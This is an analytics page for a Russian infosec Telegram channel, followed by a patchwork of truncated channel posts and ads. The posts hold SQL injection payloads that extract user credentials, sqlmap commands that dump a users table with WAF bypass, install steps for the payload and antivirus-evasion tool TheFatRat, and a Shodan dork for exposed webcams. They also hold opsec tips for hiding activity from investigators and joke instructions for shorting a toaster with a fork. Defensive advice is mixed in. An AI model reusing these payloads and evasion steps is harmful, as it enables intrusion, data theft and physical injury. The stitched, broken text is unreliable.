CodeGuard: CyberSec Edition
Канал по ИБ и этичному хакингу. Связь: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Show more📈 Analytical overview of Telegram channel CodeGuard: CyberSec Edition
Channel CodeGuard: CyberSec Edition is an active participant. Currently, the community unites 12 526 subscribers, ranking 10 134 in the Technologies & Applications category and 52 701 in the Russia region.
📊 Audience metrics and dynamics
Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 12 526 subscribers.
According to the latest data from 20 June, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 517 over the last 30 days and by 50 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 12.15%. Within the first 24 hours after publication, content typically collects 6.95% reactions from the total number of subscribers.
- Post reach: On average, each post receives 1 522 views. Within the first day, a publication typically gains 871 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 4.
- Thematic interests: Content is focused on key topics such as codeguard, pysec, docker, grep, контейнер.
📝 Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
“Канал по ИБ и этичному хакингу.
Связь: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Thanks to the high frequency of updates (latest data received on 21 June, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
• Какой ИИ ищет подработки и выполняет их за тебя? [Ссылка] • Как создать виртуальную личность и использовать её? [Инструкция] • Список нейросетей, которые сэкономят тебе 20+ рабочих часов в неделю [Открыть]На канале «BezBrain» ежедневно публикуют новости из мира технологий, конкретные ИИ-сервисы и примеры, как их применять. 📌 Сохрани, пригодится в 2026: https://t.me/+OarRsp7G11JjNTli
▶️ Критиковать его «вайфу» или любимый тайтл ▶️ Обсуждать даб против саба, нагнетая холивар ▶️ Ссылаться на несуществующие эпизоды или концовки ▶️ Демонстрировать свое превосходство в знании нишевых жанров ▶️ Использовать мемы не по канону - это выводит из себя⚡️Быстрый старт по взлому: Этап 1: Разведка (Идентификация цели):
1. Определите его любимый жанр (иссекай, меха, сёнен). 2. Выясните топ-3 тайтла в его MAL-листе. 3. Узнадите, саб или даб? Это критически важно.Этап 2: Внедрение (Установка контакта):
Начните с безобидной фразы: "Привет, видел новую серию [Название тайтла]?" Если он поправит вас на "серию" или "эпизод" - вы на верном пути.Этап 3: Эксплуатация (Запуск когнитивного диссонанса):
Заявите, что его любимый персонаж - вторичен и списан с более старого аниме. Или что финал его любимого тайтла - полная хрень и его переписали. Наблюдайте за эмоциональным взрывом. Разум взломан.💻 shikimori.one - база целей 😈 CodeGuard: CyberSec Edition | Чат
# PHP
$id = $_GET['id'];
$sql = "SELECT * FROM users WHERE id = $id";
2️⃣ Что вводит злоумышленник вместо ID
# В строку запроса: /user.php?id=1
1 OR 1=1 --
Результирующий SQL:
SELECT * FROM users WHERE id = 1 OR 1=1 --
Комментарий '--' отрезает остаток запроса. Условие '1=1' всегда истинно, поэтому вернутся ВСЕ пользователи.
3️⃣ Кража логинов и паролей
Пример ввода:
1 UNION SELECT username, password FROM users --
Если структура подходит, это вытащит все учётки. Если пароли в хешах - просто кража хешей.
4️⃣ Как это вообще работает
Сайт слепо подставляет пользовательский ввод в SQL-запрос.
Нет проверки и экранирования спецсимволов.
Атакующий использует кавычки, комментарии и операторы (UNION, OR) для изменения логики запроса.
Это хрень уровня 2000-х, но до сих пор встречается в говнокоде.
5️⃣ Защита: параметризованные запросы (Prepared Statements)
// Python с psycopg2
cur.execute("SELECT * FROM users WHERE id = %s", (user_id,))
// Вместо подстановки строки, драйвер базы сам экранирует значение.
Это главный способ. Не надо ничего фильтровать вручную.
😈 CodeGuard: CyberSec Edition | ЧатВилка металлическая - 1 шт. Розетка 220В - 1 шт. Собственная глупость - в избытке.2️⃣ Анализ уязвимости Стандартные тостеры 2025 года имеют критическую уязвимость: слоты для хлеба принимают любые проводящие объекты. Игнорирование этой
1. Вставьте вилку в розетку. 2. Аккуратно, не касаясь металла, вставьте зубцы вилки в тостер. 3. Нажмите рычаг старта.⚠️ Физический POC (Proof of Concept) Инцидент подтвердит уязвимость: яркая вспышка, хлопок, отключение автоматов в щитке. Уровень доступа: ROOT (на всю электрическую сеть квартиры). 4️⃣ Эксплуатация уязвимости Эффект достигается благодаря прямому соединению фазного провода (через вилку) с внутренней цепью тостера, которая заземлена. Возникает классическое короткое замыкание. Ваша система (тостер) будет полностью скомпрометирована. 5️⃣ Меры защиты (закрываем уязвимость)
1. Не совать вилки в тостер. Вообще. 2. Отключать прибор от сети перед любыми манипуляциями. 3. Купить нормальный, а не дебильный тостер с защитой от идиотов.💥 Результат: 100% гарантия взлома тостера и электросети. Пост в духе "Не повторяйте это дома". 😈 CodeGuard: CyberSec Edition | Чат
От форума до соцсетей и гитхаба. Паттерн - твоя смерть. OSINT-спецы соберут твой портрет за 10 минут. Разделяй активности.2️⃣Не качай и не запускай левые софтины
Особенно 'cracked', 'keygen', 'free_vpn_setup.exe'. 99% это трояны или рипперы, которые сольют твою сессию куда надо.3️⃣Не используй один пароль на все сервисы
Ты не в 2010 году. Утечка с какого-нибудь говно-форума - и аккаунты в телеге, почте и стиме летят подряд. Менеджер паролей в помощь.4️⃣Не верь в магию публичных VPN и 'анонимных' браузеров
Бесплатный VPN часто логирует и продаёт трафик. Без правильной настройки цепи и привычек ты всё равно оставляешь цифровые отпечатки.5️⃣Не хвастайся своими 'подвигами' в открытых чатах
Особенно с привязкой ко времени, месту, методологии. Это готовый протокол для следователя. Штаны спалил - сиди тихо.6️⃣Не работай с целевыми системами со своей основной OS
Никакого пентеста или скрытого серфинга с домашней винды, где открыт стим и телега. Виртуалка, лив-система с флешки, чёткое разделение.💻 Базовый чек-лист перед любым делом
- Выключена ли геолокация и синхронизация в браузере? - Проверен ли файл на вирусы (VT, любойrun)? - Используется ли одноразовая почта/номер? - Чист ли метаданный у загружаемых файлов? - Работаешь ли ты через промежуточную систему?⚠️ Запомни главное Настоящая безопасность - это не один инструмент, а паранойя и привычки. Самый слабый элемент в цепи - это ты и твоё понтование. 😈 CodeGuard: CyberSec Edition | Чат
Логин: admin Пароль: admin (или password, или пустой)Немедленно смени на сложный пароль. Минимум 12 символов, буквы, цифры, спецсимволы. 2️⃣Отключение удаленного доступа (WAN Management) Самая опасная фигня. Ищи в настройках 'Remote Management', 'Access from WAN' и ВЫКЛЮЧАЙ. Админка должна быть доступна только из локальной сети. 3️⃣Обновление прошивки Старая прошивка - дырявая прошивка. Зайди на сайт производителя, скачай последнюю стабильную версию и обнови через раздел 'Firmware Update'. 4️⃣Смена пароля Wi-Fi и WPA2/WPA3
Тип безопасности: WPA2/WPA3 (AES) Пароль: тоже сложный, не как у соседа '12345678'Отключи WPS (QSS) - эту дыру уже десять лет как взламывают за секунды. 5️⃣Проверка открытых портов Используй сервис типа 'Shodan' или 'GRC ShieldsUP!', чтобы проверить, не светится ли твой роутер в интернет с открытыми портами 22, 23, 80, 443, 7547. 6️⃣Гостевая сеть для умных чайников Для IoT-устройств (лампочки, колонки) создай отдельную гостевую сеть с изоляцией от основной. Пусть там сидят свои потенциально дебильные девайсы. ✅ Быстрая проверка После всех настроек перезагрузи роутер. Попробуй зайти в админку снова - только с новым паролем. Проверь, доступен ли интернет с устройств. 💥 Итог: роутер перестал быть мишенью для скрипт-кидди. Спи спокойно. 😈 CodeGuard: CyberSec Edition | Чат
▶️ Дефолтные пароли и логины (admin/admin) ▶️ Необновленное ПО с дырами ▶️ Открытые порты в роутере (UPnP кошмар) ▶️ Фишинг через левые приложения ▶️ Радиоэфир (Zigbee, Z-Wave) без шифрованияПример 'исследования': Обычный сценарий. Находят уязвимую камеру через Shodan.
# Поиск в Shodan может выглядеть так http.title:"webcam" country:"RU" http.component:"live view" -401И если там стоит пароль из коробки - всё, приехали. Защищайтесь, блин:
1. Меняйте пароли на ВСЕХ устройствах. 2. Выключайте UPnP в роутере. 3. Обновляйте прошивки. 4. Сажайте умные девайсы на отдельную гостевую сеть. 5. Не качайте фигню из непонятных магазинов приложений.Фишка не в том, чтобы взломать, а в том, чтобы не стать лёгкой добычей. Умный дом должен быть умным для вас, а не для кого-то ещё. 😈 CodeGuard: CyberSec Edition | Чат
# 1. Базовый скан формы
sqlmap -u "http://target.com/login.php" --forms --batch
# 2. Сканируем GET-параметр
sqlmap -u "http://target.com/news.php?id=1" --dbs --batch
# 3. Дамп конкретной БД
sqlmap -u "http://target.com/news.php?id=1" -D "webapp_db" --tables
# 4. Выгружаем таблицу users
sqlmap -u "http://target.com/news.php?id=1" -D "webapp_db" -T "users" --dump --threads=10
# 5. Только пароли (колонка password)
sqlmap -u "http://target.com/news.php?id=1" -D "webapp_db" -T "users" -C "password" --dump
Флаг --batch отвечает YES на все вопросы автоматически.
3️⃣Выводы SQLMap в реале
[INFO] the back-end DBMS is MySQL [INFO] fetching database names available databases [3]: [*] information_schema [*] mysql [*] webapp_db ← Вот наша цель!4️⃣Продвинутые фишки
# Обход WAF
sqlmap -u URL --tamper=space2comment,charencode
# Time-based инъекция (если нет ошибок)
sqlmap -u URL --technique=T --time-sec=5
# Туннелирование через SSH
sqlmap -u URL --proxy=socks5://127.0.0.1:1080
5️⃣Нюансы
🔸Только свои стенды или письменное разрешение! 🔸 --level=5 --risk=3 — максимальная агрессивность 🔸 Логгируй: sqlmap -u URL --output-dir=./sqlmap_logs 🔸 WAF блокирует? Меняй User-Agent и tamper-скрипты🧠 Где тренироваться: DVWA, bWAPP, Metasploitable, HackTheBox Полезно? ❤️ - Да 👍 - Нет 😈 CodeGuard: CyberSec Edition | Чат
pip install mitmproxy
Запускаешь:
mitmproxy -p 8080Настраиваешь устройство (или эмулятор) на прокси localhost:8080, ставишь сертификат (mitm.it) — и смотришь, кто, куда и что шлёт. 3️⃣ Почему это важно
🔵Анализ API мобилок и вебов 🔵 Вскрытие запросов в играх и приложениях 🔵 Отладка безопасности (CSRF, токены, авторизация) 🔵 Reverse engineering без SDK4️⃣ Нюансы
🟡Работай в изолированной сети или на тестовых стендах 🟡HTTPS шифруется не просто так — не ломай чужие данные 🟡В продакшене за такое можно получить бан, а не инсайт🧠 Совет: попробуй mitmweb — у mitmproxy есть шикарный веб-интерфейс, где удобно смотреть запросы и ответы в реальном времени. 😈 CodeGuard: CyberSec Edition | Чат
🔴Генерация payload’ов 🔴Обход антивирусов 🔴Автоматизация Metasploit🚀 Быстрый старт (Kali/Linux) Клонировать репозиторий:
git clone https://github.com/screetsec/TheFatRat.git
Перейти в каталог:
cd TheFatRat
Установка:
chmod +x setup.sh && ./setup.sh
Запуск и выбор нужного типа payload’а в меню.
⚠️ Используй TheFatRat только в легальных условиях: свои машины, лаборатории, CTF, официально разрешённый pentest.
😈 CodeGuard: CyberSec Edition | Чат🔵Поддержка устаревших протоколов: Проверяет, отключены ли небезопасные SSLv2, SSLv3, TLS 1.0, TLS 1.1. 🔵Слабые шифры: Ищет использование уязвимых алгоритмов шифрования (например, RC4, DES). 🔵Сертификаты: Проверяет срок действия, соответствие имени хоста (Subject Alternative Names), цепочку доверия и алгоритм подписи (SHA-1 считается сломанным). 🔵Разное: Проверяет уязвимости вроде Heartbleed (CVE-2014-0160) или поддержку сжатия данных (CRIME).Базовый сценарий: Проверка одного веб-сервера Допустим, вы админ и хотите убедиться, что ваш сайт example.com не светит старыми протоколами. 1️⃣Установка и запуск Склонируйте репозиторий и установите зависимости (обычно это просто
socket и ssl из стандартной библиотеки Python).
git clone https://github.com/.../GIDSSL.git
cd GIDSSL
python3 gidssl.py --host example.com --port 443
2️⃣Анализ вывода
Инструмент выдаст структурированный отчет. Смотрите на ключевые пункты.
[-] Checking host: example.com:443 [+] TLS 1.2 supported: YES [!] TLS 1.0 supported: YES - WARNING: Deprecated protocol enabled! [+] Certificate is valid: YES (expires in 89 days) [!] Weak cipher (RC4) found: NO ...Результат (пример):
Scan completed. Found 1 CRITICAL issue (TLS 1.0 enabled) and 3 warnings.Вывод: Обнаружена критическая проблема - поддержка устаревшего TLS 1.0. Это нужно отключить на сервере немедленно. Как это работает изнутри:
🔵Сканирование протоколов: Скрипт пытается установить соединение, используя разные версии протокола (TLS 1.0, 1.1, 1.2, 1.3), и анализирует ответ. 🔵Перебор шифров: Для каждого протокола он пытается использовать разные наборы шифров (cipher suites), предлагаемые библиотекой ssl. 🔵Анализ сертификата: После установки безопасного соединения инструмент получает и парсит сертификат, проверяя его поля и сроки.Профилактика: Как защитить свои сервисы?
🔴Отключите старые протоколы. Оставляйте только TLS 1.2 и TLS 1.3. Конфигурация зависит от вашего веб-сервера (Nginx, Apache). 🔴Настройте строгие наборы шифров. Уберите все, что использует RC4, DES, а также шифры с экспортной стойкостью. 🔴Следите за сроком действия сертификатов. Настройте автоматическое обновление (например, с помощью Certbot). 🔴Используйте инструменты вроде SSL Labs Test для регулярного независимого аудита конфигурации.😈 CodeGuard: CyberSec Edition | Чат
wget https://github.com/NationalSecurityAgency/ghidra/releases/download/Ghidra_11.0.2_build/ghidra_11.0.2_PUBLIC_20231222.zip
unzip ghidra*.zip
cd ghidra_11.0.2_PUBLIC
./ghidraRun
Базовый workflow:
# 1. Создаём проект → File → Import → выбираем бинарник
# 2. Запускаем автоанализ (Analysis → Auto Analyze)
# 3. Ищем entry points через Functions window
# 4. Декомпилируем функцию (Window → Decompile)
# 5. Переименовываем переменные и функции для понимания логики
🔬 Практические сценарии:
1. Анализ ransomware образца:
// Ghidra Script для поиска крипто-функций
void findCryptoPatterns() {
for (Function func : getCurrentProgram().getFunctionManager().getFunctions(true)) {
String name = func.getName().toLowerCase();
if (name.contains("aes") || name.contains("rsa") ||
name.contains("encrypt") || name.contains("decrypt")) {
println("Найдена крипто-функция: " + name + " @ " + func.getEntryPoint());
}
}
}
2. Реверс сетевого протокола:
◻️ Ищем функции с паттернами send/recv
◻️ Анализируем структуры пакетов через Data Type Manager
◻️ Трассируем парсинг входящих данных
3. Поиск уязвимостей в бинарниках:
# Поиск потенциальных buffer overflows
python3 find_vulns.py --binary firmware.bin --check-overflow
📌 Когда использовать Ghidra:
🔴 Анализ малвари — изучение логики шифрования, C2-команд, persistence
🔴 Исследование 0-day уязвимостей — поиск use-after-free, integer overflow
🔴 Реверс драйверов и прошивок — для IoT и embedded security
🔴 Анализ обфусцированного кода — распаковка, декрипт строк
🔴 Подготовка эксплойтов — поиск ROP gadget'ов и примитивов
🛠 Расширенные техники:
Динамический анализ с GDB/GEF:
# Настройка bridge между Ghidra и GDB
gef➤ ghidra connect localhost:1234
# Передача контекста регистров и памяти
Анализ защищённых бинарников:
👉 VMProtect, Themida — анализ виртуальных машин обфускаторов
👉 DRM системы — реверс систем защиты контента
👉 Античит-движки — изучение методов обнаружения
🔗 Интеграции и экосистема:
👉 Ghidra Bridge — связь с динамическими отладчиками (GDB, WinDbg)
👉 Karta — идентификация open-source компонентов в бинарниках
👉 VulnHunter — автоматический поиск уязвимостей
👉 GEF+Ghidra — расширенный отладочный workflow
⚠️ Требования и особенности:
🔴 Минимум 8GB RAM (рекомендуется 16+ для больших бинарников)
🔴 Java 17+ обязательна для последних версий
🔴 Плагины требуют знаний Java для самостоятельной разработки
🔴 Кривая обучения — сложнее, чем у IDA для новичков
🎯 Для кого этот инструмент:
🟢 Малвари-аналитики — исследование вредоносных программ
🟢 Реверс-инженеры — анализ проприетарного ПО и протоколов
🟢 Исследователи уязвимостей — поиск 0-day в бинарниках
🟢 Эксперты по IoT безопасности — анализ прошивок устройств
🟢 CTF-игроки — решение реверс-задач
📚 Официальная документация
💡 Совет: Начинайте с малых бинарников (до 1MB), используйте автоанализ, а затем постепенно углубляйтесь в ручной анализ. Сохраняйте проекты Ghidra - их можно переоткрывать и продолжать анализ.
😈 CodeGuard: CyberSec Edition | Чат
Available now! Telegram Research 2025 — the year's key insights 
